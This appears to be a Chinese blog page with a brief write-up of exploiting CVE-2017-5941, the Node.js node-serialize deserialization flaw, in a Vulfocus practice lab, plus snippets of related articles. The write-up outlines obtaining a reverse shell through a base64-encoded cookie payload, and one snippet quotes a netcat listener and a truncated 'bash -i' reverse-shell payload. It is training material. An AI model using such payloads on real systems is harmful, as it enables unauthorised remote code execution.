vulfocus nodejs-cve_2017_5941过程

最新推荐文章于 2024-08-30 09:53:11 发布
最新推荐文章于 2024-08-30 09:53:11 发布
阅读量1.4k 收藏
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26692927/article/details/105716023
版权

题目是清晰的,漏洞环境存在cve-2017-5941.

出现的问题:nc不能反弹shell【无 -e参数】、网上的nc 不使用 -e 反弹shell 不成功。

最后利用nodejs的反序列化成功反弹shell。

  1. 使用nodejsshell.py 生成POC:nodejsshell
  2. 添加()后进行base64编码替换cookie,反弹shell
  3. /tmp/目录下寻找flag

不知道 有没有更为轻松的办法

CVE-2017-5941 (nodejs 代码执行)
beirry的博客
11-24 1285
vulfocus-nodejs 代码执行 (CVE-2017-5941) 复现环境 攻击机(192.168.95.58) 靶场环境(10.3.61.69) 复现过程 在含有nc文件目录下打开两个cmd,监听8888端口 nc -lvp [端口] 访问环境:http://10.3.61.69:55269 账号随意输入,密码构造payload如下 _$$ND_FUNC$$_function (){require('child_process').exec('bash -c "bash -i >&amp
[春秋云镜]CVE-2017-5941
niubi707的博客
12-01 5253
Node.js node-serialize RCE
漏洞靶场搭建-Vulfocus
最新发布
Lucker_YYY的博客
08-30 367
Vulfocus 是一个漏洞,将漏洞环境 docker 镜像,放入即可使用,开箱即用。这个靶场有官方在线搭建好的,但是不知道什么原因用不了,只能自己本地搭建。
vulfocus的使用
qq_59020256的博客
04-19 562
docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.0.105 vulfocus/vulfocus用户名:admin密码:admin。
vulfocus::rocket:Vulfocus是一个扩展集成平台,将打破环境docker合并,放入即可使用,开箱即用
02-02
欢迎来到Vulfocus :rocket: Vulfocus是一个突破集成平台,将突破环境docker扩展,投入即用,开箱即用。 Vulfocus官网: ://fofapro.github.io/vulfocus/ 在线演示: : 背景 进攻靶场是目前每个安全人员以及想学习信息安全的人必备的东西,但目前商业化产品居多,还有一些类似的dvwa,sqli-labs这类的开源项目,但破坏环境比较固定,使用完一次后就失去其作用。建造的成本过高,每次启动的流程会比较繁琐,甚至很多场景是不满足的,之前关于突破性的环境耦合使用多的是vulhub,但是作为企业,高校等以及相关的培训,单纯的突破环境不一定能满足使用的需求,所以我们基于当下的一些靶场项目做出了一些小的改进来符合我们的一些需求,从而增加了标志的形式,来满足一些考核与验证的需求,可以对我们内部人员能力进行考核,于是Vulfocus就诞生了。 认识Vulfocus 因为Vulfocus一个突破性的集成平台,所以可以无限向里添加裂缝环境没有限制,而是是你的内存足够大。破坏下一无法启动的现象。 Vulfocus的docker仓库 Vu
node.js 命令执行 (CVE-2021-21315)复现[VULFOCUS]
m0_37638874的博客
09-06 2185
Node.js-systeminformation是用于获取各种系统信息的Node.JS模块,它包含多种轻量级功能,可以检索详细的硬件和系统相关信息 npm团队发布安全公告,Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315),其CVSSv3评分为7.8。攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令。里注册申请一个账号,得到一个申请的网址。
rh-nodejs8-nodejs-string_decoder-0.10.31-4.el7.noarch.rpm
01-03
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
rh-nodejs8-nodejs-require_optional-1.0.0-2.el7.noarch.rpm
01-03
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
Vulhub-CVE-2017-12635
Ronin_qianmo的博客
07-29 269
1、漏洞描述 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erl
rh-nodejs6-nodejs-string_decoder-0.10.31-4.el7.noarch.rpm
01-03
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
rh-nodejs6-nodejs-string_decoder-0.10.31-3.el7.noarch.rpm
01-03
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
vulfocus环境搭建(kali搭建)
weixin_65049289的博客
03-27 734
漏洞集成平台vulfocus的搭建
Node.js 反序列化漏洞远程执行代码(CVE-2017-5941
weixin_30377461的博客
08-18 263
实验目的 (转载自I春秋 ) 了解Node.js 序列化漏洞原理 掌握利用Node.js 序列化漏洞进行任意代码执行 漏洞原理 现在我们使用0.0.4版本的node-serialize进行研究,成功利用的话,不可信输入传递到 unserialize()的时候可以执行任意代码。创建 Payload最好使用同一模块的serialize()函数。 我创建了以下 JavaScript...
【网络安全---vulfocus】安装vulfocus教程
m0_67844671的博客
09-09 2858
安装docker镜像,安装vulfocus
vulfocus 靶机环境搭建部署
热门推荐
csd_ct的专栏
11-05 2万+
vulfocus 本质上是一个漏洞集成平台,里面集成了大量的CVE漏洞环境,采用的是docker环境部署安装,使用起来方便,可作为一个优秀靶场环境,提升实战能力。可本地部署安装,也可以直接使用线上环境vulfocus (fofa.so)http://vulfocus.fofa.so/#/login?redirect=%2Fdashboard 类似的漏洞集成环境,如vulhub也是一个不错的实验环境,不过vulfocus的漏洞都比较新,但数量少,vulhub收集的漏洞个数较多,但大多...
vulhub nginx CVE-2017-7529
weixin_37639863的博客
02-19 263
漏洞复现-CVE-2017-7529-敏感信息泄露 - 铺哩 - 博客园Nginx敏感信息泄露漏洞(CVE-2017-7529)https://www.cnblogs.com/cute-puli/p/13282355.html poc #!/usr/bin/env python import sys import requests if len(sys.argv) < 2: print("%s url" % (sys.argv[0])) print("eg: py...
[Vulfocus解题] shiro 反序列化 (CVE-2016-4437)
m0_67401153的博客
04-11 682
解题过程: 1.打开靶场环境,进入首页 2.使用shiro反序列化工具执行命令 3.执行ls命令查看当前目录下存在什么文件 发现flag
插件分享 | Vulfocus 快速启动靶场环境一键打靶
m0_46699477的博客
12-01 6417
作为安全小白的插件作者,曾经最困惑的就是,拿着自带强大靶标漏洞库的 Goby 去扫描,却总是很难找到漏洞的影子,这让起步去学习安全知识这件事变得困难,后来了解到靶场工具,开始使用 Vulfocus,一个想法随之产生:将 Vulfocus 通过插件的方式集成到 Goby,更方便快捷的一键启动漏洞环境一键扫描漏洞。于是现在的这款插件应运而生~
安全攻防实验-2】VulFocus搭建
qq_26579613的博客
02-07 1104
建议内网搭建
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值